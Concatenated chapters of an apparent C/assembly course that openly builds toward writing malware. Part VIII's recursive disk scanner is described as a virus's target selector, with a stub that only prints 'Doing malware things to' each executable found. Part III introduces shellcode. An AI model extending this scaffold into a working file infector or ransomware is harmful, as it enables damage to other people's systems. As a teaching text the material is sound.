233 | - gcc is generating 32 bits values for our constants. Even if we declare our variables as `char`, a 32 bits value will be generated... Later in the series we will learn why.
234 | - The `add` instruction is a bit different. Intel machine code encodes the registers in the opcode to save space, that is why the machine code for the `add ebx,ebp` is just `0x01 0xeb`, instead of our `0x01, 0x00, 0x01`. Check the intel manual for full details
235 | 
236 | Well, we have managed to write some C code that almost exactly matches the machine code we want the computer to run... this is why C is considered a low level programming language :).
237 | 
238 | # For the Lulz
239 | Just for fun. Let's see how the ASM for ARM will look like.
240 | 
241 | First let's compile the program for ARM:
242 | 
243 | `$ arm-linux-gnueabi-gcc -fomit-frame-pointer -o ph1-arm ph1.c`
244 | 
245 | And now, let's look at the code:
246 | 
247 | 
248 |     $ arm-linux-gnueabi-objdump -M intel -d ph1-arm | grep -A 20 '<f1>'
249 |     Unrecognised disassembler option: intel
250 |     0000840c <f1>:
251 |         840c:	e92d0030 	push	{r4, r5}
252 |         8410:	e3a0400a 	mov	r4, #10
253 |         8414:	e3a05014 	mov	r5, #20
254 |         8418:	e0844005 	add	r4, r4, r5
255 |         841c:	e1a03004 	mov	r3, r4
256 |         8420:	e1a00003 	mov	r0, r3
257 |         8424:	e8bd0030 	pop	{r4, r5}
258 |         8428:	e12fff1e 	bx	lr
259 | 
260 | OK, the OP codes are completely different, but the assembly is pretty accurate. You can see that, for ARM, the `add` instruction accepts 3 parameters instead of just 2. Other than that... it is pretty similar to our SCTW-2000 ASM and also to the Intel 64bits ASM.
261 | 
262 | And for MIPS we get:
263 | 
264 |     $ mips-linux-gcc -fomit-frame-pointer -o ph1-mips ph1-1.c
265 |     $ mips-linux-objdump -d ph1-mips | grep -A 20 '<f1>'
266 |     00400720 <f1>:
267 |       400720:	2402000a 	li	v0,10
268 |       400724:	24030014 	li	v1,20
269 |       400728:	00431021 	addu	v0,v0,v1
270 |       40072c:	03e00008 	jr	ra
271 |       400730:	00000000 	nop
272 | 
273 | This is a bit different but still... change `li` to `mov` and `addu` to add... and there you go.
274 | 
275 | 
276 | # Conclusions
277 | Well, this concludes the first part of this course. We have quickly seen the main components of a computer, and the relation between the machine code, the assembler and the C programming language. We have also seen that knowing the language syntax is just a small part of what you need to know to actually write useful code. Finally, we have checked why C is considered a low level programming language and we've also got a glimpse of how the language can be used to control what is actually executed by the processor.
278 | 
279 | Please, let me know in the comments if you have found this useful, if it is comprehensive, if you are missing something, if you got bored to death... and click the heart icon if you are interested in more installments for this series (I know some people read the posts but never comment on them)... I won't bother you guys in case you are not interested in this kind of stuff.
280 | 
281 | # Appendix. Installing required tools
282 | In case you need help to get the tools we used in this tutorial, here are some pointers :slight_smile:
283 | 
284 | For intel you can just install  build-essential
285 | 
286 |     apt-get install build-essential
287 | 
288 | This should install all the tools you need, including the compiler. For non debian based distros you need to look for the packages for `gcc` and the so-called `binutils`.
289 | 
290 | For ARM things are also easy
291 | 
292 |      apt-get install gcc-arm-linux-gnueabihf
293 |      apt-get install gcc-arm-linux-gnueabi
294 | 
295 | The first one is for Hardware Floating-Point and should work for any recent ARM. Just go for that. You may also need to install the binutils package for ARM
296 | 
297 |     apt-get install binutils-arm-linux-gnueabi
298 | 
299 | For MIPS you won't find a toolchain in your distro repository, so you have to get one from somewhere else or compile your own. Check this page to choose one. I cannot remember which one I used for this post.
300 | 
301 | https://www.linux-mips.org/wiki/Toolchains
302 | 
303 | Just uncompress the toolchain anywhere and set your `PATH` to the directory containing all the binaries... That's it
304 | 
305 | 
306 | * NEXT: [Programming for Wannabes. Part II. Systemcalls](part-02.md)
307 | 


--------------------------------------------------------------------------------
/part-08.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes VIII. File Details
  2 | We have learnt how to scan directories and list their content, now we need to figure out how to get the details of the directory contents so we can chose the files we are interested on. This is actually very simple and requires one single system call.
  3 | 
  4 | # The `stat` system call
  5 | 
  6 | The `stat` system call allows us to get all the details of a specific file. The prototype of this syscall is:
  7 | 
  8 | ```C
  9 | int stat(const char *pathname, struct stat *statbuf);
 10 | ```
 11 | 
 12 | And the `struct stat` (now we know what a struct is don't we?), contains the following information:
 13 | 
 14 | ```C
 15 | struct stat {
 16 |        dev_t     st_dev;         /* ID of device containing file */
 17 |        ino_t     st_ino;         /* Inode number */
 18 |        mode_t    st_mode;        /* File type and mode */
 19 |        nlink_t   st_nlink;       /* Number of hard links */
 20 |        uid_t     st_uid;         /* User ID of owner */
 21 |        gid_t     st_gid;         /* Group ID of owner */
 22 |        dev_t     st_rdev;        /* Device ID (if special file) */
 23 |        off_t     st_size;        /* Total size, in bytes */
 24 |        blksize_t st_blksize;     /* Block size for filesystem I/O */
 25 |        blkcnt_t  st_blocks;      /* Number of 512B blocks allocated */
 26 | 
 27 |        /* Since Linux 2.6, the kernel supports nanosecond
 28 |           precision for the following timestamp fields.
 29 |           For the details before Linux 2.6, see NOTES. */
 30 | 
 31 |         struct timespec st_atim;  /* Time of last access */
 32 |         struct timespec st_mtim;  /* Time of last modification */
 33 |         struct timespec st_ctim;  /* Time of last status change */
 34 | };
 35 | ```
 36 | 
 37 | The most interesting field for us is `st_mode`, but there is a lot of other useful information that we will be using in the future. The structure is described in the `stat` man page for future reference.
 38 | 
 39 | # Understanding the `st_mode` field
 40 | 
 41 | The `st_mode` field encodes the type of file and also the permissions. The man page includes some sample code showing us how to access that information. So, the way to access the type of file is using the bit mask `S_IFMT`:
 42 | 
 43 | ```C
 44 | struct stat sb;
 45 | stat (a_file_name, &sb);
 46 | int type = sb.st_mode & S_IFMT;
 47 | ```
 48 | 
 49 | The `&` operator is a bitwise AND.... It basically compares two binary numbers bit by bit, and only the bits that are set to 1 in both numbers remain set in the result. Let's see what is in `S_IFMT`. I can tell you directly, but I believe it is going to be good for you to learn how to get this information by yourself, so you can find whatever you want  in the future.
 50 | 
 51 | We will start looking in the header files indicated by the man page. At the top of the man page you will see the `includes` you need to add to your program to use the system call. 
 52 | 
 53 | 
 54 |     NAME
 55 |            stat, fstat, lstat, fstatat - get file status
 56 |     
 57 |     SYNOPSIS
 58 |            #include <sys/types.h>
 59 |            #include <sys/stat.h>
 60 |            #include <unistd.h>
 61 | 
 62 | 
 63 | The `sys/types.h` sounds pretty generic so I will skip it (you can actually look into it, but you won't find anything). So let's look into `sys/stat.h` that sounds more like the specifics for `stat`.
 64 | 
 65 |     $ grep "IFMT" /usr/include/sys/stat.h
 66 |     # define S_IFMT         __S_IFMT
 67 |     #define __S_ISTYPE(mode, mask)  (((mode) & __S_IFMT) == (mask))
 68 | 
 69 | Well, looks like the actual value is defined somewhere else, but we can see also a macro to quickly check against the different types. We can use it like:
 70 | 
 71 | ```C
 72 | __S_ISTYPE(sb.st_mode,S_IFREG)
 73 | // is equivalent to
 74 | (((sb.st_mode) & __S_IFMT) == (S_IFREG))
 75 | ```
 76 | 
 77 | That second define is called a macro. They work the same than the normal defines (they are just substituted by its value in the code before compiling) but we can use parameters to write more complex expressions. When we use parameters, the `define` is said to define a macro instead of a constant.
 78 | 
 79 | So, in order to find out the actual value of `S_IFMT`, we need to look into the includes, included by the include :). 
 80 | 
 81 |     $ grep "#include" /usr/include/sys/stat.h
 82 |     #include <features.h>
 83 |     #include <bits/types.h>         /* For __mode_t and __dev_t.  */
 84 |     #include <bits/stat.h>
 85 | 
 86 | _NOTE:I'm using grep to show this information. It is, in general, very handy to do it this way, but I would recommend, at the beginning, to find these information manually, that is, opening the file in an editor and browse through it. The reason is that you will see how this system include files look like and get familiar with them. You will also find curious thing that will spark your curiosity._
 87 | 
 88 | Again, we can go through all of them systematically, but `bits/stat.h` looks like the best candidate.
 89 | 
 90 |     $ grep "IFMT" /usr/include/bits/stat.h
 91 |     #define __S_IFMT        0170000 /* These bits determine file type.  */
 92 | 
 93 | We found it!. Actually if we open the file, we will also find, all the other relevant constants. These are the ones:
 94 | 
 95 | ```C
 96 | #define __S_IFMT        0170000 /* These bits determine file type.  */
 97 | 
 98 | /* File types.  */
 99 | #define __S_IFDIR       0040000 /* Directory.  */
100 | #define __S_IFCHR       0020000 /* Character device.  */
101 | #define __S_IFBLK       0060000 /* Block device.  */
102 | #define __S_IFREG       0100000 /* Regular file.  */
103 | #define __S_IFIFO       0010000 /* FIFO.  */
104 | #define __S_IFLNK       0120000 /* Symbolic link.  */
105 | #define __S_IFSOCK      0140000 /* Socket.  */
106 | 
107 | /* Protection bits.  */
108 | 
109 | #define __S_ISUID       04000   /* Set user ID on execution.  */
110 | #define __S_ISGID       02000   /* Set group ID on execution.  */
111 | #define __S_ISVTX       01000   /* Save swapped text after use (sticky).  */
112 | #define __S_IREAD       0400    /* Read by owner.  */
113 | #define __S_IWRITE      0200    /* Write by owner.  */
114 | #define __S_IEXEC       0100    /* Execute by owner.  */
115 | ```
116 | 
117 | But. Wait a minute!. Those numbers look a bit weird isn't it?
118 | 
119 | # Base 8, octal numbers
120 | So far we have been using decimal numbers (using base 10) and also hexadecimal numbers (using base 16). OK, true, and binaries (using base 2). However there is another base that is useful when working with computers. This is base 8 and the numbers represented in this base are said to be in octal format.
121 | 
122 | In C, you can write octal numbers just adding a `0` at the beginning of the number, the same way that we add a `0x` to represent an hexadecimal value. Octal representation is useful when we need to manipulate blocks of 3 bits (0 to 7.... that's eight values, hence octal). So, let's try to understand the values of the constants used by `stat`.
123 | 
124 | To understand how this matches to the hexadecimal representation, let's just count using both bases:
125 | 
126 |     HEX   OCT  BIN
127 |     0     0    0000 0000
128 |     1     1    0000 0001  <--
129 |     2     2    0000 0010  <--
130 |     3     3    0000 0011 
131 |     4     4    0000 0100  <--
132 |     5     5    0000 0101
133 |     6     6    0000 0110
134 |     7     7    0000 0111
135 |     8    10    0000 1000
136 |     9    11    0000 1001  <--
137 |     A    12    0000 1010  <--
138 |     B    13    0000 1011
139 |     C    14    0000 1100 <--
140 |     D    15    0000 1101
141 |     E    16    0000 1110
142 |     F    17    0000 1111
143 |     10   20    0001 0000
144 | 
145 | As you can see, when using the octal representation, the last (rightmost) digit of our number is actually the value of the lower 3 bits of the number. Each further position to the left represents the next 3 bits, so the octal representation is very useful when we need to work with blocks of 3 bits, instead of 4 (we use hexadecimal in those cases).
146 | 
147 | For instance, check this out. Hopefully it will look familiar to you:
148 | 
149 |     chmod 777 afile
150 |           000 111 111 111 -> 0777
151 |           0001 1111 1111  -> 0x1ff
152 | 
153 | Both numbers `0x1ff` and `0777` are the same number (511 in decimal), but the octal representation allows us to write the digits as groups of three bits. In this case, each group of three bits holds the read, write and execution permissions for the owner, the group and the rest of users respectively. Imagine using `chmod` with decimal or hexadecimal numbers... It would be very tricky to change permissions of a file like that.
154 | 
155 | Anyhow and summing up, octal representation is used here and there whenever it is convenient to access the bits in a number in groups of three and not four. And one of these cases is the file permissions.
156 | 
157 | # Back to the `st_mode` constants
158 | Now, we can look again to the `st_mode` constants:
159 | 
160 | ```C
161 | #define __S_IFMT        0170000 /* These bits determine file type.  */
162 | 
163 | /* File types.  */
164 | #define __S_IFDIR       0040000 /* Directory.  */
165 | #define __S_IFCHR       0020000 /* Character device.  */
166 | #define __S_IFBLK       0060000 /* Block device.  */
167 | #define __S_IFREG       0100000 /* Regular file.  */
168 | #define __S_IFIFO       0010000 /* FIFO.  */
169 | #define __S_IFLNK       0120000 /* Symbolic link.  */
170 | #define __S_IFSOCK      0140000 /* Socket.  */
171 | 
172 | /* Protection bits.  */
173 | 
174 | #define __S_ISUID       04000   /* Set user ID on execution.  */
175 | #define __S_ISGID       02000   /* Set group ID on execution.  */
176 | #define __S_ISVTX       01000   /* Save swapped text after use (sticky).  */
177 | #define __S_IREAD       0400    /* Read by owner.  */
178 | #define __S_IWRITE      0200    /* Write by owner.  */
179 | #define __S_IEXEC       0100    /* Execute by owner.  */
180 | ```
181 | 
182 | Let's first figure out the structure of this field. Representing the different octal values as bit masks. You can check the table in the previous section to verify the values, but we just use blocks of 3 bits....
183 | 
184 |     001 111 000 000 000 000  -> __S_IFMT   (0170000)
185 | 	000 100 000 000 000 000  -> __S_IFDIR  (0040000)
186 | 	000 010 000 000 000 000  -> __S_IFCHR  (0020000)
187 | 	000 110 000 000 000 000  -> __S_IFBLK  (0060000)
188 | 	001 000 000 000 000 000  -> __S_IFREG  (0100000)
189 | 	000 001 000 000 000 000  -> __S_IFIFO  (0010000)
190 | 	001 010 000 000 000 000  -> __S_IFLNK  (0120000)
191 | 	001 100 000 000 000 000  -> __S_IFSOCK (0140000)
192 |       ^ ^^^	
193 |     000 000 100 000 000 000  -> __S_ISUID  (0004000)
194 | 	000 000 010 000 000 000  -> __S_ISGID  (0002000)
195 | 	000 000 001 000 000 000  -> __S_ISVTX  (0001000)
196 |             ^^^	
197 | 	000 000 000 100 000 000  -> __S_IREAD  (0000400)
198 | 	000 000 000 010 000 000  -> __S_IWRITE (0000200)
199 | 	000 000 000 001 000 000  -> __S_IEXEC  (0000100)
200 | 	            ^^^
201 | 
202 | As we can see, `__S_IFMT` is a mask to extract the high bits of the field, which identify the type of file. Also note how the constants for the file types are defined already placed in those high bits, so we can compare against them directly just after ANDing with the mask.
203 | 
204 | After the type of file, we find the special file attributes that indicate whether the file is _SetUID_ or _SetGID_ and whether the sticky bit is active. After that follow the file permissions for the owner, the group and the rest of users.
205 | 
206 | Yes, you are right, `bits/stat.h` only defines the masks for the owner. Actually, the constants defined above shouldn't be used by normal programs; we should use the ones redefined in `sys/stat.h`. I will include them here for you to check them out:
207 | 
208 | ```C
209 | /* Protection bits.  */
210 | 
211 | #define S_ISUID __S_ISUID       /* Set user ID on execution.  */
212 | #define S_ISGID __S_ISGID       /* Set group ID on execution.  */
213 | 
214 | #define S_IRUSR __S_IREAD       /* Read by owner.  */
215 | #define S_IWUSR __S_IWRITE      /* Write by owner.  */
216 | #define S_IXUSR __S_IEXEC       /* Execute by owner.  */
217 | /* Read, write, and execute by owner.  */
218 | #define S_IRWXU (__S_IREAD|__S_IWRITE|__S_IEXEC)
219 | 
220 | #define S_IRGRP (S_IRUSR >> 3)  /* Read by group.  */
221 | #define S_IWGRP (S_IWUSR >> 3)  /* Write by group.  */
222 | #define S_IXGRP (S_IXUSR >> 3)  /* Execute by group.  */
223 | /* Read, write, and execute by group.  */
224 | #define S_IRWXG (S_IRWXU >> 3)
225 | 
226 | #define S_IROTH (S_IRGRP >> 3)  /* Read by others.  */
227 | #define S_IWOTH (S_IWGRP >> 3)  /* Write by others.  */
228 | #define S_IXOTH (S_IXGRP >> 3)  /* Execute by others.  */
229 | /* Read, write, and execute by others.  */
230 | #define S_IRWXO (S_IRWXG >> 3)
231 | ```
232 | 
233 | I have removed a couple of lines to make the file easier to read. Here you can see how all the constants are redefined, and how the group and other permissions are just shifted versions of the original user masks we have just seen.
234 | 
235 | > NOTE: The `>>` operator shifts all the bits of the left hand operand to the right as many positions as the right hand operand indicates. `S_IRUSR >> 3` will shift the `S_IRUSR` value 3 positions to the right. In this case: `S_IRUSR = __S_IREAD = 0000400`, and shifting it three positions to the right will produce `040` (remember that each octal digit represents a group of 3 bits).
236 | 
237 | Well, this has been kind of a digression, but these concepts are usually confusing for beginners and I thought it would be great to add some explanation to the course.
238 | 
239 | # Back to our `select_target`
240 | 
241 | So, now we can modify our `select_target` to find the kind of files we are interested in. This is what the new function will look like:
242 | 
243 | ```C
244 | // Scans the directory `folder` and calls `pf` with the name of every
245 | // regular file that has at least one execute permission bit set.
246 | int select_target (PAYLOAD_FUNC pf) {
247 |   char                buf[BUF_SIZE];
248 |   struct linux_dirent *de;
249 |   struct stat         st;
250 |   int                 fd, n, i;
251 |   
252 |   if ((fd = open (folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:");
253 | 
254 |   while (1) {
255 |     n = getdents (fd, buf, BUF_SIZE);
256 |     if (n < 0) MFW_EXIT ("getdents:");
257 |     if (n == 0) break; // End of directory
258 | 
259 |     for (i = 0; i < n;) {
260 |       de = (struct linux_dirent *)(buf + i);
261 |       i += de->d_reclen; // Advance first, so the `continue` below cannot loop forever
262 |       if ((fstatat (fd, de->d_name, &st, 0)) < 0) {
263 |         perror ("stat:");
264 |         continue; // Just ignore the error
265 |       }
266 |       // Regular file with any execute bit set (owner, group or others)
267 |       if (((st.st_mode & S_IFMT) == S_IFREG)
268 |           && (st.st_mode & 00111))
269 |         pf (de->d_name);
270 |     }
271 |   }
272 | 
273 |   close (fd);
274 |   return 0;
275 | }
276 | ```
277 | 
278 | Two comments on this code:
279 | 
280 | 1. We have used `fstatat` instead of `fstat` or `stat`, so we do not have to build the full path to the file before calling `stat`. This syscall uses the directory file descriptor as base and tries to look for the file **AT** the directory that we pass as first parameter. In this case it is very convenient and we avoid allocating memory for strings and concatenating them.
281 | 2. This is the `select_target` for a virus. We are checking that the directory entry is a regular file (`S_IFREG`) and then we check that it is executable. In this case we are just checking for all possible executable permissions but that may be different in a real case.
282 | 
283 | The permission checking could also be written like:
284 | 
285 | ```C
286 | st.st_mode & 00111; // Is the same than
287 | st.st_mode & (S_IXUSR|S_IXGRP|S_IXOTH)
288 | ```
289 | 
290 | Second one is better as you can easily see what we are comparing to... and the generated code would be the same... But first one is shorter and I chose that.
291 | 
292 | Now, you can try to change the program to look for other kinds of files, as may happen in the case of ransomware or spyware. But you need a last piece of knowledge in order to be able to complete the implementation of `select_target`.
293 | 
294 | # Recursive functions
295 | The problem with our current `select_target` is that, it can only scan a single directory. In general, we should be able to scan the whole disk, that means that, we need to modify the function so, each time we find a directory, we also scan it. Or in other words, each time we find a directory we need to call ourselves again with the new directory name to scan.
296 | 
297 | A function that calls itself is known as a recursive function. Recursive functions are very powerful and usually allow us to write very small and elegant code to deal with complex problems. A classical example is traversing a tree. It is way easier to do it with a recursive function than with normal iterative code.
298 | 
299 | In general, a recursive function trades code complexity for memory usage. That is normal, we always trade either speed, memory or complexity. That's life. A recursive function will make extensive use of the stack, creating stack frames again and again each time it calls itself. But other than that they are neat solutions to many problems, and usually require way less code than an iterative solution.
300 | 
301 | _NOTE: The old BASIC programming language in the first microcomputers of the 80s didn't have a stack. It had the concept of subroutine but, lacking a stack, you couldn't call a function recursively. That, together with the design of the language, was the cause of a lot of [spaghetti code](https://en.wikipedia.org/wiki/Spaghetti_code) in the programs of that time._
302 | 
303 | # A recursive `select_target`
304 | So, it's time to modify our program to be able to scan the whole disk. For that we will need to modify the function signature, so we get the current folder being scanned in the stack frame of our function and we can continue our work at the right place after processing every subfolder.
305 | 
306 | We will also add some messages and some indentation to the function, to easily check that your function is working fine:
307 | 
308 | 
309 | ```C
310 | 
311 | int level = 0;       // Current nesting depth, used as index into `tabs`
312 | char tabs[1024];     // Indentation string printed in front of every message
313 | 
314 | int payload (char *target) {
315 |   return printf ("%s Doing malware things to %s\n", tabs, target) < 0 ? -1 : 0;
316 | }
317 | 
318 | int select_target (int old_fd, char *folder, PAYLOAD_FUNC pf) {
319 |   char                buf[BUF_SIZE];
320 |   int                 flag = 1;
321 |   struct linux_dirent *de;
322 |   struct stat         st;
323 |   int                 fd, n, i;
324 |   
325 |   // Scan directory `folder` (resolved relative to `old_fd`), recursing into sub-directories
326 | 
327 |   // Open directory using openat
328 |   printf ("%s Processing : %s\n", tabs, folder); 
329 |   if ((fd = openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:");
330 |   // Update indentation string
331 |   tabs[level] = ' ';
332 |   level ++;
333 |   
334 |   while (flag) {
335 |     n = getdents (fd, buf, BUF_SIZE);
336 |     if (n < 0) MFW_EXIT ("getdents:");
337 |     if (n == 0) break;
338 | 
339 |     // Walk the variable-length records returned by getdents
340 |     for (i = 0; i < n;) {
341 |       de = (struct linux_dirent *)(buf + i);
342 |       if ((fstatat (fd, de->d_name, &st, 0)) < 0) {
343 | 	    perror ("stat:");
344 | 	    continue; // Just ignore the error<- This is a bug can you fix it?
345 |       }
346 |       if (((st.st_mode & S_IFMT) == S_IFREG)
347 | 	        && (st.st_mode & 00111))
348 | 	           pf (de->d_name);
349 |       else if (((st.st_mode & S_IFMT) == S_IFDIR)
350 | 	             && !(de->d_name[0] == '.'
351 | 		              && (de->d_name[1] == 0
352 | 		                  || (de->d_name[1] == '.' && de->d_name[2]==0))))
353 | 	                          select_target (fd, de->d_name, pf);
354 | 	 
355 |       i += de->d_reclen;
356 |     }
357 |   }
358 |   // Remove indentation: step back first, then erase the space added on entry
359 |   level--;
360 |   tabs[level] = 0;
361 |   close (fd);
362 |   return 0;
363 | }
364 | ```
365 | 
366 | Apart from the indentation thingy (we just add a space to a string every time we enter the function and remove it every time we leave), there are two main changes:
367 | 
368 | ```C
369 |   if ((fd = openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) MFW_EXIT("open:");
370 | ```
371 | 
372 | We have changed `open` for `openat`. This works the same way as `fstatat`: we just pass a file descriptor as first parameter and, if the second parameter (the `pathname`) is relative, it will open the file from the indicated directory; otherwise, if the path is absolute, it will behave like a normal `open`.
373 | 
374 | This is convenient so we do not need to build the full file name ourselves. That is not a big deal (`strcpy`+ `strcat`), but this way we do not have to.
375 | 
376 | The second change is the recursive call. Basically, we just need to check if the directory entry is a directory. If that is the case we call ourselves again with the sub-directory name. However, remember the `.` and `..` entries we mentioned in last instalment?.... Sure, you do... well, we need to skip those, otherwise we get into an infinite loop.... This is the rest of the check.
377 | 
378 | ```C
379 | if (((st.st_mode & S_IFMT) == S_IFDIR)
380 | 	             && !(de->d_name[0] == '.'
381 | 		              && (de->d_name[1] == 0
382 | 		                  || (de->d_name[1] == '.' && de->d_name[2]==0))))
383 | 	                          select_target (fd, de->d_name, pf);
384 | ```
385 | 
386 | So, our `select_target` for malwares that need to look for files is ready. 
387 | 
388 | # Removing libC
389 | 
390 | So, we have been learning a lot about C programming, and we haven't talked much about asm. We will be looking to assembler in the coming instalments, but before starting with that we are going to remove the libc dependencies from our current test program, so we can have full control on the assembler version we are going to generate.
391 | 
392 | So far, we are using the following system calls:
393 | 
394 |     exit
395 |     write
396 |     openat
397 |     close
398 |     getdents
399 |     fstatat
400 | 
401 | So, our first task will be to generate a mini libc version for our program. This is easier than expected:
402 | 
403 | ```asm
404 | 	.global mfw_exit
405 | 	.global mfw_write
406 | 	.global mfw_close
407 | 	.global mfw_openat
408 | 	.global mfw_newfstatat
409 | 	.global mfw_getdents
410 | 	
411 | mfw_write:
412 | 	mov $0x01, %eax         /* syscall number for write */
413 | 	syscall
414 | 	ret
415 | 	
416 | mfw_openat:
417 | 	mov $0x101, %eax        /* syscall number for openat */
418 | 	syscall
419 | 	ret
420 | 	
421 | mfw_close:
422 | 	mov $0x03, %eax         /* syscall number for close */
423 | 	syscall
424 | 	ret
425 | 
426 | mfw_exit:
427 | 	mov $0x3c, %eax         /* syscall number for exit */
428 | 	syscall
429 | 	ret
430 | 
431 | mfw_newfstatat:
432 | 	mov %rcx, %r10          /* 4th argument: C passes it in RCX, the kernel expects R10 */
433 | 	mov $0x106, %eax        /* syscall number for newfstatat ('$' marks an immediate) */
434 | 	syscall
435 | 	ret
436 | 
437 | mfw_getdents:
438 | 	mov $78, %eax           /* syscall number for getdents */
439 | 	syscall
440 | 	ret
441 | 
442 | mfw_open:
443 | 	mov $0x02, %eax         /* syscall number for open */
444 | 	syscall
445 | 	ret
446 | 
447 | mfw_lstat:
448 | 	mov $0x06, %eax         /* syscall number for lstat */
449 | 	syscall
450 | 	ret
451 | 
452 | ```
453 | 
454 | Have you noticed something strange? The implementation of all syscalls is pretty straightforward, except for `fstatat`. This syscall has a peculiarity: it is the only one here that takes four parameters, and the C ABI and the kernel ABI differ for the fourth parameter. C functions get that parameter in `RCX`, as we already know, but kernel syscalls expect it in `R10`. I forgot about that and spent quite some time figuring out why the syscall was failing.
455 | 
456 | # The final version
457 | So, this is how the final version will look like:
458 | 
459 | ```C
460 | #include <fcntl.h>
461 | #include <sys/types.h>  
462 | #include <sys/stat.h>   // Stat struct
463 | 
464 | #define BUF_SIZE 1024
465 | 
466 | // XXX: Move this to a .h file
467 | // Dirent Data struct
468 | struct linux_dirent {
469 |   long           d_ino;     // Inode number
470 |   long           d_off;     // Offset to the next entry
471 |   unsigned short d_reclen;  // Size in bytes of this whole record (used to step through the buffer)
472 |   char           d_name[];  // Null-terminated file name
473 | };
474 | 
475 | int     mfw_getdents (int fd, char *buf, int len);  // Syscall wrappers implemented in minilibc.S
476 | int     mfw_exit (int r);
477 | int     mfw_openat(int dirfd, const char *pathname, int flags);
478 | int     mfw_newfstatat (int dirfd, char *p, struct stat *st, int flags);
479 | int     mfw_close (int fd);
480 | size_t  mfw_write(int fd, const void *buf, size_t count);
481 | 
482 | #define MFW_EXIT(s) do {mfw_exit (1);} while (0) // `s` is ignored: exits with status 1, prints nothing
483 | 
484 | typedef int (*PAYLOAD_FUNC)(char *); // Callback invoked with the name of each selected file
485 | 
486 | // Global vars
487 | int level = 0;    // Current nesting depth, used as index into `tabs`
488 | char tabs[1024];  // Indentation string printed in front of every message
489 | 
490 | int mfw_puts (char *s) {
491 |   for (; *s; s++) mfw_write (1, s, 1); // One write syscall per character, to stdout
492 |   return 0;
493 | }
494 | // Helper function to write tabbed strings: indentation, `s`, optional `v`, newline
495 | int mfw_print_tstr (char *s, char *v) {
496 |   mfw_puts (tabs);
497 |   mfw_puts (s);
498 |   if (v) mfw_puts (v);
499 |   mfw_puts ("\n");
500 |   return 0;
501 | }
502 | int payload (char *target) {
503 |   mfw_print_tstr ("   ++ Doing malware things to ", target);
504 |   return 0;
505 | }
506 | int select_target (int old_fd, char *folder, PAYLOAD_FUNC pf) {
507 |   char                buf[BUF_SIZE];
508 |   struct linux_dirent *de;
509 |   struct stat         st;
510 |   int                 fd, n, i;
511 |   // Recursively scans `folder` (relative to `old_fd`); calls `pf` on executable regular files
512 |   tabs[level] = ' ';   // One more space of indentation for this level
513 |   level ++;
514 | 
515 |   mfw_print_tstr (">> Entering ", folder);
516 | 
517 |   if ((fd = mfw_openat (old_fd, folder, O_RDONLY | O_DIRECTORY)) < 0) goto clean;
518 |   
519 |   while (1) {
520 |     n = mfw_getdents (fd, buf, BUF_SIZE);
521 |     if (n < 0) break;  // Give up on this folder: retrying the same call would loop forever
522 |     if (n == 0) break; // End of directory
523 | 
524 |     for (i = 0; i < n;) {
525 |       de = (struct linux_dirent *)(buf + i);
526 |       if ((mfw_newfstatat (fd, de->d_name, &st, 0)) < 0) goto next;
527 |       
528 |       if (((st.st_mode & S_IFMT) == S_IFREG) && (st.st_mode & 00111))
529 | 	    pf (de->d_name);
530 |       else if (((st.st_mode & S_IFMT) == S_IFDIR)
531 | 	       && !(de->d_name[0] == '.'
532 | 		     && (de->d_name[1] == 0
533 | 		         || (de->d_name[1] == '.' && de->d_name[2]==0))))
534 | 	    select_target (fd, de->d_name, pf); // Sub-directory other than "." and ".."
535 |     next:
536 |       i += de->d_reclen;
537 |     }
538 |   }
539 |  clean:
540 |   mfw_print_tstr ("<< Leaving ", folder);
541 |   level--;                     // Step back first...
542 |   tabs[level] = 0;             // ...then erase the space added on entry
543 |   if (fd >= 0) mfw_close (fd); // fd is negative when openat failed
544 |   return 0;
545 | }
546 | 
547 | int main (int argc, char *argv[]) {
548 |   // `tabs` is a global, so it is already zero-initialized when we get here
549 |   if (argc < 2) return 1; // No folder given: argv[1] would be NULL
550 |   return select_target (AT_FDCWD, argv[1], payload); // AT_FDCWD: relative paths start at the cwd
551 | }
552 | ```
553 | 
554 | As I did last time. This version has a few updates that I haven't described in the text. Try to understand what they are for and do not hesitate to ask your questions in case you cannot figure it out by yourself.
555 | 
556 | I named the asm code in previous section `minilibc.S`. So, in order to compile my program I have to do:
557 | 
558 |     gcc -o select_files select_file.c minilibc.S
559 | 
560 | # Conclusion
561 | We have now working code to scan a disk and test some basic file information as the type of file and the permissions. We have also learned how to navigate the system include files to find out the information we need and also how to master the octal numeric representation.
562 | 
563 | We have removed the libC dependencies and we are ready for an asm implementation. We will find out if that asm implementation is worth the extra effort, and after that we will be ready to get started with some simple payload....
564 | 


--------------------------------------------------------------------------------
/part-03.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes. Part III. Your first Shell Code
  2 | 
  3 | Let's go on with our special ASM/C programming course. At this point, we roughly know how a computer works, its main components, what is machine code, what is assembly code and how to compile simple programs for a few architectures.
  4 | 
  5 | In this part we are going to write our first shellcode. Yes, we are that advanced. But, before we get there, we will be exploring a few more new concepts. Let's start.
  6 | 
  7 | # Processor Native Word Size
  8 | In this part we will start dealing with stuff bigger than 1 byte, and to understand what is going on, we need to introduce the _Processor Native Word Size_. In a sense, you already know what it means. Whenever you talk about 32bits and 64bits processors/programs... well, that is the processor native word size.
  9 | 
 10 | However, beyond being the type of Linux distribution you choose to install, this value has some low level implications:
 11 | 
 12 | * This value is the native size of the processor registers. Do you remember the registers within the processor? Sure you do. So, a 32bits processor has 32bits registers and a 64bits processor has 64bits registers. This is not completely accurate but, for now, just consider this size as the one the processor is comfortable with.
 13 | * This value is usually also the width of the data bus.
 14 | * And, it is usually also the width of the address bus... 
 15 | 
 16 | Overall, and without going into the electronics within the processor, what you need to know is that each processor is optimised to work with its native word size. This way, a 32bits processor will perform arithmetic operations or access memory faster when it deals with a 32bits long value than when it deals with a 16bits long value. I know, this is a bit counter-intuitive and a bit of an act of faith, but it would be very long and tedious to go through the details to understand this. Actually I'm not sure I could successfully guide you through that path.
 17 | 
 18 | To further illustrate this, below is a fragment of the "Intel 80386 Programmer's Reference Manual" from 1986 (http://microsym.com/editor/assets/386intel.pdf). You can find it in section 2.2 "Data Types" page 24.
 19 | 
 20 | 
 21 | > Note that words need not be aligned at even-numbered addresses and
 22 | > doublewords need not be aligned at addresses evenly divisible by four. This
 23 | > allows maximum flexibility in data structures (e.g., records containing
 24 | > mixed byte, word, and doubleword items) and efficiency in memory
